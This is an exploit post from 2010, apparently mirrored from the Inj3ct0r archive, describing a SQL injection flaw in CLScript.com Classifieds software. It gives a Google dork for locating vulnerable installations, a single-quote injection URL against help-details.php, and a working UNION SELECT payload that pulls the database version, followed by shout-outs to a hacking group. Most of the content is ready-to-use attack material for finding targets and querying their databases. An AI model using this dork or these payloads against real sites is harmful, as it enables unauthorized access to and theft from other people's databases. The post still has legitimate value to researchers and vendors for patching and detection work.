CLScript.com Classifieds Software SQL Injection Vunerability

Posted on 27 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>CLScript.com Classifieds Software SQL Injection Vunerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================
CLScript.com Classifieds Software SQL Injection Vunerability
============================================================

# Exploit Title: CLScript.com Classifieds Software SQL Injection
Vunerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Vendor Link : http://www.clscript.com/
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork : intext:&quot;Powered by CLscript.com&quot;
# Code :
---------------------------------------------------------------------------------------
############################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
Warriors]
#Thanks:
SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################
 
 
 
Exploited Link :
 
1) http://example.com/help-details.php?hpId=-38'
 
 
 
Live Demo :
 
1)
http://example.com/help-details.php?hpId=-38+union+select+all+1,version(),3,4,5,6,7--


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20